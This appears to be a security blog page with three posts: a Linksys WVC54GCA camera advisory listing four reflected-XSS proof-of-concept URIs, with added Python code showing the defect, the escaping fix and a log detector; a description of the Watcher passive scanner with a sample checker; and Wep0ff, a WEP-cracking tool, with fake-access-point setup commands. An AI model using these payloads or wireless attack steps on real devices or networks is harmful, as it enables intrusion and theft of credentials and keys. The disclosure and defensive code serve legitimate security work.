Apr 27

Now the Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera is open to multiple XSS vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may use these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera firmware 1.00R22 and 1.00R24 are affected; other versions may also be vulnerable, so be careful.

The Exploit :-

To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/adm/file.cgi?todo=xss&this_file=%3cscript%3ealert(1)%3c/script%3e
http://www.example.com/adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
http://www.example.com/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E

Ref -> GNUCITIZEN
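Added example, not code from the GNUCITIZEN advisory or from the Linksys firmware: it puts the defect the advisory describes (a query parameter reflected into HTML verbatim) next to the fix (HTML-escape on output), and adds a check over access-log lines that flags requests carrying markup in the reflected parameters named above. The function names render_vulnerable, render_hardened and suspicious_requests, and the log lines in LOG_LINES, are constructed for this illustration; the request URIs in the log reuse the example URIs listed above plus one benign request.

```python
"""Added example, not code from the GNUCITIZEN advisory or the Linksys firmware.

Shows the reflected parameter defect beside its fix, and a log check that
flags markup in the parameters the advisory names. render_vulnerable,
render_hardened, suspicious_requests and LOG_LINES are constructed here.
"""
import re
from html import escape
from urllib.parse import parse_qs, unquote, urlsplit

# Parameter names the advisory says the camera's CGI pages reflect unescaped.
REFLECTED_PARAMS = ("this_file", "next_file")


def _param(query: str, name: str) -> str:
    """Return the first value of `name` in a query string (percent-decoded)."""
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(query: str) -> str:
    """The defect: the decoded value is dropped straight into the page body."""
    return f"<p>Next file: {_param(query, 'next_file')}</p>"


def render_hardened(query: str) -> str:
    """The fix: escape <, >, &, and quotes on output so markup stays inert text."""
    return f"<p>Next file: {escape(_param(query, 'next_file'), quote=True)}</p>"


# Constructed access-log lines in Common Log Format; the request URIs reuse
# the example URIs from the advisory plus one benign request.
LOG_LINES = [
    '10.0.0.5 - - [27/Apr/2009:10:00:01 +0000] "GET /img/main.cgi?next_file=index.htm HTTP/1.1" 200 512',
    '10.0.0.7 - - [27/Apr/2009:10:00:02 +0000] "GET /adm/file.cgi?todo=xss&this_file=%3cscript%3ealert(1)%3c/script%3e HTTP/1.1" 200 733',
    '10.0.0.9 - - [27/Apr/2009:10:00:03 +0000] "GET /main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E HTTP/1.1" 200 733',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Tag characters, or an on*= event-handler attribute, in a decoded value.
MARKUP_RE = re.compile(r"[<>]|\bon\w+\s*=", re.IGNORECASE)


def suspicious_requests(log_lines):
    """Return (path, param, decoded value) for requests whose reflected
    parameters contain markup. parse_qs percent-decodes once; unquote runs a
    second time so a double-encoded payload is caught as well."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group(1))
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in REFLECTED_PARAMS:
            for raw in params.get(name, []):
                value = unquote(raw)
                if MARKUP_RE.search(value):
                    hits.append((parts.path, name, value))
    return hits


if __name__ == "__main__":
    query = "next_file=%3Cscript%3Ealert(1)%3C/script%3E"
    print("vulnerable:", render_vulnerable(query))
    print("hardened:  ", render_hardened(query))
    for hit in suspicious_requests(LOG_LINES):
        print("flagged:", hit)
```

The log check decodes before matching, so the lowercase `%3c` and uppercase `%3C` encodings in the advisory's URIs are treated alike; on the camera itself the durable fix is the output encoding shown in render_hardened, since a denylist on input is easy to bypass.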

Apr 26


Apr 14

Good, there is another good tool for pen testers called Watcher.
Watcher is a runtime passive-analysis tool for HTTP-based web applications. It gives pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads, cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:

>Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, JavaScript, and CSS
>Works seamlessly with complex Web 2.0 applications while you drive the Web browser
>Non-intrusive, will not raise alarms or damage production sites
>Real-time analysis and reporting – findings are reported as they’re found, exportable to XML
>Configurable domains with wildcard support
>Extensible framework for adding new checks
Download Watcher.zip
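Added example, not Watcher's own code: a passive check in the style the feature list describes. It only inspects a response that has already been captured and never sends a request of its own, and it covers three of the items listed above (cookie flags, server version disclosure in HTTP headers, and HTML comments left in the page). parse_response, passive_checks, SAMPLE_URL and SAMPLE_RESPONSE are constructed for this illustration.

```python
"""Added example, not Watcher's own code.

A passive response check: inspect a captured response, send nothing.
parse_response, passive_checks and SAMPLE_RESPONSE are constructed here.
"""
import re

# Constructed response as it might be captured from a browser proxy.
SAMPLE_URL = "https://camera.example/index.htm"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.11\r\n"
    "Set-Cookie: sessionid=abc123; Path=/\r\n"
    "Set-Cookie: lang=en; Path=/; Secure; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><!-- internal build 42, db host db1.internal --><body>ok</body></html>"
)


def parse_response(raw: str):
    """Split a raw HTTP response into (status line, [(name, value)], body).
    Header names are lower-cased so checks are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def passive_checks(url: str, raw: str):
    """Return a list of finding strings for one captured response."""
    findings = []
    _, headers, body = parse_response(raw)
    over_https = url.lower().startswith("https://")
    for name, value in headers:
        if name == "set-cookie":
            cookie = value.split("=", 1)[0].strip()
            # Attributes after the first "; " (Path, Secure, HttpOnly, ...).
            attrs = {a.strip().lower() for a in value.split(";")[1:]}
            if over_https and "secure" not in attrs:
                findings.append(f"cookie {cookie}: set over HTTPS without the Secure flag")
            if "httponly" not in attrs:
                findings.append(f"cookie {cookie}: readable by script (no HttpOnly flag)")
        elif name == "server" and re.search(r"\d", value):
            findings.append(f"Server header discloses software version: {value}")
    # Comments are often left behind with internal hostnames or build notes.
    for comment in re.findall(r"<!--(.*?)-->", body, re.DOTALL):
        findings.append(f"HTML comment left in page: {comment.strip()}")
    return findings


if __name__ == "__main__":
    for finding in passive_checks(SAMPLE_URL, SAMPLE_RESPONSE):
        print(finding)
```

Because the check takes the page URL as input, the Secure-flag finding is only raised for responses served over HTTPS, which is the same reason a passive tool needs to sit in the browser's path rather than work from saved HTML alone.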

Apr 9

Another WEP key cracking tool, called Wep0ff.
Wep0ff is a new tool that recovers a WEP key without access to the AP by mounting a fake access point attack against WEP-based wireless clients. It uses a combination of fragmentation and evil twin attacks to generate traffic that can be used for KoreK-style WEP-key recovery.

This code was tested with patched madwifi-old drivers with athraw support, but it also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for the fake AP) and a second in monitor mode (to listen on).

How to Use:
1. Set up the fake AP with the KARMA tools or iwconfig:
   iwpriv ath0 mode 2
   iwconfig ath0 mode master essid foo enc 1122334455 channel 7
   echo 1 > /proc/sys/dev/ath0/rawdev
   echo 1 > /proc/sys/dev/ath0/rawdev_type
   ifconfig ath0 up
   ifconfig ath0raw up
2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)
3. Wait until a client connects to the fake access point
4. Launch airodump-ng to collect packets
5. Launch aircrack-ng to recover the WEP key
Download Wep0ff